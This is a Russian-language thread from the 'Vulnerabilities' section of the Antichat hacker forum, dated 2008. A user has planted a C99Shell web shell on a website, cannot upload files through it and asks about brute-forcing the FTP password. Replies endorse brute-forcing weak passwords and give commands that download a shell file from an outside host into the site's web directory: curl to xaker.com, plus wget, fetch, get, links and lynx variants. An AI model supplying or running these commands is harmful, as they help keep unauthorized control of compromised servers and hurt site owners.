Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   C99Shell (https://forum.antichat.xyz/showthread.php?t=78828)

ttt0z 29.07.2008 06:16

C99Shell
 
Поставил на сайт C99Shell, пасс на фтп через какое-то время сменили, а файлы через шелл не заливаються, заливаються, только остаються с нулевым размером, Safe-mode: OFF (not secure), кто нибудь знает как исправить ситуацию?
Реально ли подобрать пароль на фтп через FTP brute в этом шеле?

LEE_ROY 29.07.2008 06:23

проверь или место на фтп есть, попобуй не залитвать новый файл а отредактировать старый, сбрутить реально если пасс несложный ессно ..

ttt0z 29.07.2008 06:25

пробовал редактировать та же фигня (

права на сам шелл -rwxr-xr-x, реально ли его перезаписать например на remview.php и залить нужные мне файлы?

fly 29.07.2008 13:54

В этом шелле подсветка есть же зеленым куда можно писать и что можно редактировать, попробуй просто создать новый файл в директории, которая открыта на запись.

o3,14um 29.07.2008 15:23

Попробуй не заливать, а создать файл (если это текстовик(скрипт например)) с тем же контентом

ttt0z 29.07.2008 16:36

fly, да директории все открыты на запись

пробовал создавать фал, он создаеться но седержимое не записываеться ((( получаеться файл нулевого размера ... хз что делать...

fly 29.07.2008 22:53

а wget curl юзал!

Попробуй curl --output /дира_куда_лить/shell.php http://xaker.com/shell.txt

ttt0z 30.07.2008 04:15

Цитата:

Сообщение от fly
а wget curl юзал!

Попробуй curl --output /дира_куда_лить/shell.php http://xaker.com/shell.txt

че-то не работает (((

вот так пишу и нажимую Экскуте
curl --output /home/user/public_html/shell.php http://xaker.com/shell.txt

так писать надо?

blaga 30.07.2008 05:07

чтобы узнать какие качалки есть на серваке введи
which lynx links get wget fetch curl
получишь что то типа
/usr/bin/links
/usr/bin/wget
/usr/bin/curl

так не всегда может сработать. тогда вводи названия качалок по отдельности.


а вот примеры разных заливок
curl --output /[папка куда льем]/shell.php http://[откуда заливаем]/shell.txt
fetch -o /[папка куда льем]/shell.php http://[откуда заливаем]/shell.txt
wget -o /[папка куда льем]/shell.php http://[откуда заливаем]/shell.txt
get http://[откуда заливаем]/shell.txt > /[папка куда льем]/shell.php
links -source "http://[откуда заливаем]/shell.txt" > /[папка куда льем]/shell.php
lynx -source http://[откуда заливаем]/shell.txt > /[папка куда льем]/shell.php


пробуй.


Время: 07:25